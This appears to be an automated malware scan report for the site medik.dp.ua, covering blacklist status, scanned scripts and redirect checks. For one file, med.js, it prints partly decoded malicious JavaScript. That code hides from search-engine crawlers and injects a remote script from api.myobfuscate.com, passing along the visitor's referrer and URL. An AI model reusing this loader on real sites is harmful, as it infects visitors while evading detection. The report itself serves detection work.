Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=medik.dp.ua
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://medik.dp.ua/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.medik.dp.ua/ | 200 OK Content-Length: 19421 Content-Type: text/html | clean |
http://www.medik.dp.ua/swfobject.js | 200 OK Content-Length: 6830 Content-Type: application/javascript | clean |
http://www.medik.dp.ua/img_func.js | 200 OK Content-Length: 1066 Content-Type: application/javascript | clean |
http://www.medik.dp.ua/includes/med.js | 200 OK Content-Length: 4783 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: api.myobfuscate.com var _1lO='=sTKpUGchN2cl9FKlBXYjNXZuVHKlRXaydnL05WZtV3YvR2Op80TPhCZslGaDRmblBHch5yTwwmC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9AyTwwGIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ3c0V2Z/8SbvNmLlRXYjNXdmJ2b51mLpBXYv8iOwRHdodCI9AyYyNnLP90TKsTKnQHcpJ3YzdCK05WZtVGbFVGdhVmcj5CduVWb1N2bkBSPg80TPBichZ3O9tTKosWYlJnQ7BSKw0jPpcSZsRnc1R1JoY2T4VGZulmL05WZnFkclNXduI3b ...[4373 bytes skipped]... Decoded script: ...[2332 bytes skipped]... re%20%3D%3D%20true%29%20%3F%20%22%3B%20secure%22%20%3A%20%22%22%29%3B%20%7D%3C/script%3E';if(window.navigator.userAgent.indexOf('Rambler')>=0 || window.navigator.userAgent.indexOf('Yandex')>=0 || window.navigator.userAgent.indexOf('Yaho')>=0 || window.navigator.userAgent.indexOf('Googlebot')>=0 || window.navigator.userAgent.indexOf('Turtle')>=0) {Break();};var OOO = document.createElement('script'); OOO.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var l0O = document.getElementsByTagName('head')[0]; l0O.appendChild(OOO);document.write(unescape(_escape)); var _escape='%3Cscript%3Eif%28parent.window.opener%29%7B%20rt5389%20%3D%20GetCookie5389%28%27r5389%27%29%3B%20if%20%28rt5389%20%3D%3D%20null%29%20%7B%20rref5389%3Ddocument.referrer%3B%20rref5389%3Dunescape%28rref5389%29%3B%20var%20ExpDate%20%3D%20new%20Da ...[2760 bytes skipped]... | ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19489 Content-Type: text/javascript | clean |
http://www.medik.dp.ua//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 347 Content-Type: text/html | clean |
http://www.medik.dp.ua/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: medik.dp.ua
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: medik.dp.ua
Referer: http://www.google.com/search?q=medik.dp.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.